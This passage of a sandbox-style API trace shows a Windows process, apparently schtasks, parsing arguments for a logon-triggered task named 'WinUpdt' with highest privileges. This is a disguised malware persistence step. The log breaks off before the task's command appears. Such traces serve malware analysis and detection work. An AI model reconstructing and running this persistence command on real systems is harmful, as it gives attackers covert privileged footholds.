_BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.688] lstrlenW (lpString="|showsid|") returned 9 [0067.688] lstrlenW (lpString="|f|") returned 3 [0067.688] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0 [0067.688] SetLastError (dwErrCode=0x490) [0067.688] SetLastError (dwErrCode=0x490) [0067.688] SetLastError (dwErrCode=0x0) [0067.688] lstrlenW (lpString="/f") returned 2 [0067.688] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0 [0067.688] SetLastError (dwErrCode=0x490) [0067.688] SetLastError (dwErrCode=0x0) [0067.688] lstrlenW (lpString="/f") returned 2 [0067.688] GetProcessHeap () returned 0x660000 [0067.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x6) returned 0x676918 [0067.688] GetProcessHeap () returned 0x660000 [0067.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6752f8 [0067.688] SetLastError (dwErrCode=0x0) [0067.688] SetLastError (dwErrCode=0x0) [0067.688] lstrlenW (lpString="/sc") returned 3 [0067.688] lstrlenW (lpString="-/") returned 2 [0067.688] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.688] lstrlenW (lpString="?") returned 1 [0067.688] lstrlenW (lpString="?") returned 1 [0067.688] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.688] lstrlenW (lpString="sc") returned 2 [0067.688] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.688] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|?|") returned 3 [0067.688] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.689] lstrlenW (lpString="|?|") returned 3 [0067.689] lstrlenW (lpString="|sc|") returned 4 [0067.689] SetLastError (dwErrCode=0x490) [0067.689] lstrlenW (lpString="create") returned 6 [0067.689] lstrlenW (lpString="create") returned 6 [0067.689] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.689] lstrlenW (lpString="sc") returned 2 [0067.689] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.689] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.689] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.689] lstrlenW (lpString="|create|") returned 8 [0067.689] lstrlenW (lpString="|sc|") returned 4 [0067.689] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0067.689] SetLastError (dwErrCode=0x490) [0067.689] lstrlenW (lpString="delete") returned 6 [0067.689] lstrlenW (lpString="delete") returned 6 [0067.689] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.689] lstrlenW (lpString="sc") returned 2 [0067.689] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.689] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|delete|") returned 8 [0067.689] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.689] lstrlenW (lpString="|delete|") returned 8 [0067.689] lstrlenW (lpString="|sc|") returned 4 [0067.689] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0067.689] SetLastError (dwErrCode=0x490) [0067.689] lstrlenW (lpString="query") returned 5 [0067.689] lstrlenW (lpString="query") returned 5 [0067.689] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.689] lstrlenW (lpString="sc") returned 2 [0067.689] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.689] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x8, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|query|") returned 7 [0067.689] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.689] lstrlenW (lpString="|query|") returned 7 [0067.689] lstrlenW (lpString="|sc|") returned 4 [0067.689] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0067.689] SetLastError (dwErrCode=0x490) [0067.689] lstrlenW (lpString="change") returned 6 [0067.689] lstrlenW (lpString="change") returned 6 [0067.690] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] lstrlenW (lpString="sc") returned 2 [0067.690] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|change|") returned 8 [0067.690] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.690] lstrlenW (lpString="|change|") returned 8 [0067.690] lstrlenW (lpString="|sc|") returned 4 [0067.690] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0067.690] SetLastError (dwErrCode=0x490) [0067.690] lstrlenW (lpString="run") returned 3 [0067.690] lstrlenW (lpString="run") returned 3 [0067.690] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] lstrlenW (lpString="sc") returned 2 [0067.690] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|run|") returned 5 [0067.690] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.690] lstrlenW (lpString="|run|") returned 5 [0067.690] lstrlenW (lpString="|sc|") returned 4 [0067.690] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0067.690] SetLastError (dwErrCode=0x490) [0067.690] lstrlenW (lpString="end") returned 3 [0067.690] lstrlenW (lpString="end") returned 3 [0067.690] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] lstrlenW (lpString="sc") returned 2 [0067.690] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|end|") returned 5 [0067.690] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.690] lstrlenW (lpString="|end|") returned 5 [0067.690] lstrlenW (lpString="|sc|") returned 4 [0067.690] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0067.690] SetLastError (dwErrCode=0x490) [0067.690] lstrlenW (lpString="showsid") returned 7 [0067.690] lstrlenW (lpString="showsid") returned 7 [0067.690] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.690] lstrlenW (lpString="sc") returned 2 [0067.690] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.691] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0xa, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|showsid|") returned 9 [0067.691] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|sc|") returned 4 [0067.691] lstrlenW (lpString="|showsid|") returned 9 [0067.691] lstrlenW (lpString="|sc|") returned 4 [0067.691] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0067.691] SetLastError (dwErrCode=0x490) [0067.691] SetLastError (dwErrCode=0x490) [0067.691] SetLastError (dwErrCode=0x0) [0067.691] lstrlenW (lpString="/sc") returned 3 [0067.691] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0067.691] SetLastError (dwErrCode=0x490) [0067.691] SetLastError (dwErrCode=0x0) [0067.691] lstrlenW (lpString="/sc") returned 3 [0067.691] GetProcessHeap () returned 0x660000 [0067.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x8) returned 0x676928 [0067.691] GetProcessHeap () returned 0x660000 [0067.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675338 [0067.691] SetLastError (dwErrCode=0x0) [0067.691] SetLastError (dwErrCode=0x0) [0067.691] lstrlenW (lpString="ONLOGON") returned 7 [0067.691] lstrlenW (lpString="-/") returned 2 [0067.691] StrChrIW (lpStart="-/", wMatch=0x4f) returned 0x0 [0067.691] SetLastError (dwErrCode=0x490) [0067.691] SetLastError (dwErrCode=0x490) [0067.691] SetLastError (dwErrCode=0x0) [0067.691] lstrlenW (lpString="ONLOGON") returned 7 [0067.691] StrChrIW (lpStart="ONLOGON", wMatch=0x3a) returned 0x0 [0067.691] SetLastError (dwErrCode=0x490) [0067.691] SetLastError (dwErrCode=0x0) [0067.691] lstrlenW (lpString="ONLOGON") returned 7 [0067.691] GetProcessHeap () returned 0x660000 [0067.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674ca8 [0067.691] GetProcessHeap () returned 0x660000 [0067.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675358 [0067.691] SetLastError (dwErrCode=0x0) [0067.691] SetLastError (dwErrCode=0x0) [0067.691] lstrlenW (lpString="/RL") returned 3 [0067.691] lstrlenW (lpString="-/") returned 2 [0067.691] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.691] lstrlenW (lpString="?") returned 1 [0067.691] lstrlenW (lpString="?") returned 1 [0067.691] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] lstrlenW (lpString="RL") returned 2 [0067.692] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|?|") returned 3 [0067.692] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.692] lstrlenW (lpString="|?|") returned 3 [0067.692] lstrlenW (lpString="|RL|") returned 4 [0067.692] SetLastError (dwErrCode=0x490) [0067.692] lstrlenW (lpString="create") returned 6 [0067.692] lstrlenW (lpString="create") returned 6 [0067.692] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] lstrlenW (lpString="RL") returned 2 [0067.692] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.692] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.692] lstrlenW (lpString="|create|") returned 8 [0067.692] lstrlenW (lpString="|RL|") returned 4 [0067.692] StrStrIW (lpFirst="|create|", lpSrch="|RL|") returned 0x0 [0067.692] SetLastError (dwErrCode=0x490) [0067.692] lstrlenW (lpString="delete") returned 6 [0067.692] lstrlenW (lpString="delete") returned 6 [0067.692] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] lstrlenW (lpString="RL") returned 2 [0067.692] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|delete|") returned 8 [0067.692] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.692] lstrlenW (lpString="|delete|") returned 8 [0067.692] lstrlenW (lpString="|RL|") returned 4 [0067.692] StrStrIW (lpFirst="|delete|", lpSrch="|RL|") returned 0x0 [0067.692] SetLastError (dwErrCode=0x490) [0067.692] lstrlenW (lpString="query") returned 5 [0067.692] lstrlenW (lpString="query") returned 5 [0067.692] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] lstrlenW (lpString="RL") returned 2 [0067.692] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.692] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x8, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|query|") returned 7 [0067.692] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.693] lstrlenW (lpString="|query|") returned 7 [0067.693] lstrlenW (lpString="|RL|") returned 4 [0067.693] StrStrIW (lpFirst="|query|", lpSrch="|RL|") returned 0x0 [0067.693] SetLastError (dwErrCode=0x490) [0067.693] lstrlenW (lpString="change") returned 6 [0067.693] lstrlenW (lpString="change") returned 6 [0067.693] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.693] lstrlenW (lpString="RL") returned 2 [0067.693] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.693] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|change|") returned 8 [0067.693] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.693] lstrlenW (lpString="|change|") returned 8 [0067.693] lstrlenW (lpString="|RL|") returned 4 [0067.693] StrStrIW (lpFirst="|change|", lpSrch="|RL|") returned 0x0 [0067.693] SetLastError (dwErrCode=0x490) [0067.693] lstrlenW (lpString="run") returned 3 [0067.693] lstrlenW (lpString="run") returned 3 [0067.693] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.693] lstrlenW (lpString="RL") returned 2 [0067.693] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.693] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|run|") returned 5 [0067.693] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.693] lstrlenW (lpString="|run|") returned 5 [0067.693] lstrlenW (lpString="|RL|") returned 4 [0067.693] StrStrIW (lpFirst="|run|", lpSrch="|RL|") returned 0x0 [0067.693] SetLastError (dwErrCode=0x490) [0067.693] lstrlenW (lpString="end") returned 3 [0067.693] lstrlenW (lpString="end") returned 3 [0067.693] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.693] lstrlenW (lpString="RL") returned 2 [0067.693] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.693] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|end|") returned 5 [0067.693] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.693] lstrlenW (lpString="|end|") returned 5 [0067.693] lstrlenW (lpString="|RL|") returned 4 [0067.693] StrStrIW (lpFirst="|end|", lpSrch="|RL|") returned 0x0 [0067.693] SetLastError (dwErrCode=0x490) [0067.693] lstrlenW (lpString="showsid") returned 7 [0067.694] lstrlenW (lpString="showsid") returned 7 [0067.694] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.694] lstrlenW (lpString="RL") returned 2 [0067.694] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.694] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0xa, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|showsid|") returned 9 [0067.694] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|RL|") returned 4 [0067.694] lstrlenW (lpString="|showsid|") returned 9 [0067.694] lstrlenW (lpString="|RL|") returned 4 [0067.694] StrStrIW (lpFirst="|showsid|", lpSrch="|RL|") returned 0x0 [0067.694] SetLastError (dwErrCode=0x490) [0067.694] SetLastError (dwErrCode=0x490) [0067.694] SetLastError (dwErrCode=0x0) [0067.694] lstrlenW (lpString="/RL") returned 3 [0067.694] StrChrIW (lpStart="/RL", wMatch=0x3a) returned 0x0 [0067.694] SetLastError (dwErrCode=0x490) [0067.694] SetLastError (dwErrCode=0x0) [0067.694] lstrlenW (lpString="/RL") returned 3 [0067.694] GetProcessHeap () returned 0x660000 [0067.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x8) returned 0x676938 [0067.694] GetProcessHeap () returned 0x660000 [0067.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675378 [0067.694] SetLastError (dwErrCode=0x0) [0067.694] SetLastError (dwErrCode=0x0) [0067.694] lstrlenW (lpString="HIGHEST") returned 7 [0067.694] lstrlenW (lpString="-/") returned 2 [0067.694] StrChrIW (lpStart="-/", wMatch=0x48) returned 0x0 [0067.694] SetLastError (dwErrCode=0x490) [0067.694] SetLastError (dwErrCode=0x490) [0067.694] SetLastError (dwErrCode=0x0) [0067.694] lstrlenW (lpString="HIGHEST") returned 7 [0067.694] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0067.694] SetLastError (dwErrCode=0x490) [0067.694] SetLastError (dwErrCode=0x0) [0067.694] lstrlenW (lpString="HIGHEST") returned 7 [0067.694] GetProcessHeap () returned 0x660000 [0067.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674cd8 [0067.694] GetProcessHeap () returned 0x660000 [0067.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675398 [0067.694] SetLastError (dwErrCode=0x0) [0067.694] SetLastError (dwErrCode=0x0) [0067.694] lstrlenW (lpString="/tn") returned 3 [0067.694] lstrlenW (lpString="-/") returned 2 [0067.695] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.695] lstrlenW (lpString="?") returned 1 [0067.695] lstrlenW (lpString="?") returned 1 [0067.695] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.695] lstrlenW (lpString="tn") returned 2 [0067.695] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.695] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|?|") returned 3 [0067.695] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.695] lstrlenW (lpString="|?|") returned 3 [0067.695] lstrlenW (lpString="|tn|") returned 4 [0067.695] SetLastError (dwErrCode=0x490) [0067.695] lstrlenW (lpString="create") returned 6 [0067.695] lstrlenW (lpString="create") returned 6 [0067.695] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.695] lstrlenW (lpString="tn") returned 2 [0067.695] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.695] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.695] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.695] lstrlenW (lpString="|create|") returned 8 [0067.695] lstrlenW (lpString="|tn|") returned 4 [0067.695] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0067.695] SetLastError (dwErrCode=0x490) [0067.695] lstrlenW (lpString="delete") returned 6 [0067.695] lstrlenW (lpString="delete") returned 6 [0067.695] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.695] lstrlenW (lpString="tn") returned 2 [0067.695] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.695] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|delete|") returned 8 [0067.695] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.695] lstrlenW (lpString="|delete|") returned 8 [0067.695] lstrlenW (lpString="|tn|") returned 4 [0067.695] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0067.695] SetLastError (dwErrCode=0x490) [0067.695] lstrlenW (lpString="query") returned 5 [0067.695] lstrlenW (lpString="query") returned 5 [0067.695] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] lstrlenW (lpString="tn") returned 2 [0067.696] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x8, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|query|") returned 7 [0067.696] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.696] lstrlenW (lpString="|query|") returned 7 [0067.696] lstrlenW (lpString="|tn|") returned 4 [0067.696] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0067.696] SetLastError (dwErrCode=0x490) [0067.696] lstrlenW (lpString="change") returned 6 [0067.696] lstrlenW (lpString="change") returned 6 [0067.696] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] lstrlenW (lpString="tn") returned 2 [0067.696] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|change|") returned 8 [0067.696] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.696] lstrlenW (lpString="|change|") returned 8 [0067.696] lstrlenW (lpString="|tn|") returned 4 [0067.696] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0067.696] SetLastError (dwErrCode=0x490) [0067.696] lstrlenW (lpString="run") returned 3 [0067.696] lstrlenW (lpString="run") returned 3 [0067.696] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] lstrlenW (lpString="tn") returned 2 [0067.696] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|run|") returned 5 [0067.696] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.696] lstrlenW (lpString="|run|") returned 5 [0067.696] lstrlenW (lpString="|tn|") returned 4 [0067.696] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0067.696] SetLastError (dwErrCode=0x490) [0067.696] lstrlenW (lpString="end") returned 3 [0067.696] lstrlenW (lpString="end") returned 3 [0067.696] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] lstrlenW (lpString="tn") returned 2 [0067.696] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.696] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|end|") returned 5 [0067.696] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.697] lstrlenW (lpString="|end|") returned 5 [0067.697] lstrlenW (lpString="|tn|") returned 4 [0067.697] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0067.697] SetLastError (dwErrCode=0x490) [0067.697] lstrlenW (lpString="showsid") returned 7 [0067.697] lstrlenW (lpString="showsid") returned 7 [0067.697] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.697] lstrlenW (lpString="tn") returned 2 [0067.697] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.697] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0xa, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|showsid|") returned 9 [0067.697] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tn|") returned 4 [0067.697] lstrlenW (lpString="|showsid|") returned 9 [0067.697] lstrlenW (lpString="|tn|") returned 4 [0067.697] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0067.697] SetLastError (dwErrCode=0x490) [0067.697] SetLastError (dwErrCode=0x490) [0067.697] SetLastError (dwErrCode=0x0) [0067.697] lstrlenW (lpString="/tn") returned 3 [0067.697] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0067.697] SetLastError (dwErrCode=0x490) [0067.697] SetLastError (dwErrCode=0x0) [0067.697] lstrlenW (lpString="/tn") returned 3 [0067.697] GetProcessHeap () returned 0x660000 [0067.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x8) returned 0x676948 [0067.697] GetProcessHeap () returned 0x660000 [0067.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6753b8 [0067.697] SetLastError (dwErrCode=0x0) [0067.697] SetLastError (dwErrCode=0x0) [0067.697] lstrlenW (lpString="'WinUpdt'") returned 9 [0067.697] lstrlenW (lpString="-/") returned 2 [0067.697] StrChrIW (lpStart="-/", wMatch=0x27) returned 0x0 [0067.697] SetLastError (dwErrCode=0x490) [0067.697] SetLastError (dwErrCode=0x490) [0067.697] SetLastError (dwErrCode=0x0) [0067.697] lstrlenW (lpString="'WinUpdt'") returned 9 [0067.697] StrChrIW (lpStart="'WinUpdt'", wMatch=0x3a) returned 0x0 [0067.697] SetLastError (dwErrCode=0x490) [0067.697] SetLastError (dwErrCode=0x0) [0067.697] lstrlenW (lpString="'WinUpdt'") returned 9 [0067.698] GetProcessHeap () returned 0x660000 [0067.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6753d8 [0067.698] GetProcessHeap () returned 0x660000 [0067.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6753f8 [0067.698] SetLastError (dwErrCode=0x0) [0067.698] SetLastError (dwErrCode=0x0) [0067.698] lstrlenW (lpString="/tr") returned 3 [0067.698] lstrlenW (lpString="-/") returned 2 [0067.698] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.698] lstrlenW (lpString="?") returned 1 [0067.698] lstrlenW (lpString="?") returned 1 [0067.698] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.698] lstrlenW (lpString="tr") returned 2 [0067.698] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.698] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|?|") returned 3 [0067.698] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.698] lstrlenW (lpString="|?|") returned 3 [0067.698] lstrlenW (lpString="|tr|") returned 4 [0067.698] SetLastError (dwErrCode=0x490) [0067.698] lstrlenW (lpString="create") returned 6 [0067.698] lstrlenW (lpString="create") returned 6 [0067.698] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.698] lstrlenW (lpString="tr") returned 2 [0067.698] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.698] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.698] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", 